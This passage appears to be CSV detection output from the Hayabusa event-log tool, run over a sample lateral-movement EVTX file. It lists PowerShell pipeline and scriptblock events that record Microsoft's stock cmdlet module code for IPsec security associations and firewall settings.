2021-04-22 19:19:38.834 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.859 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.859 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null
$__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.860 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.860 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.860 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.861 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember 
-Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] 
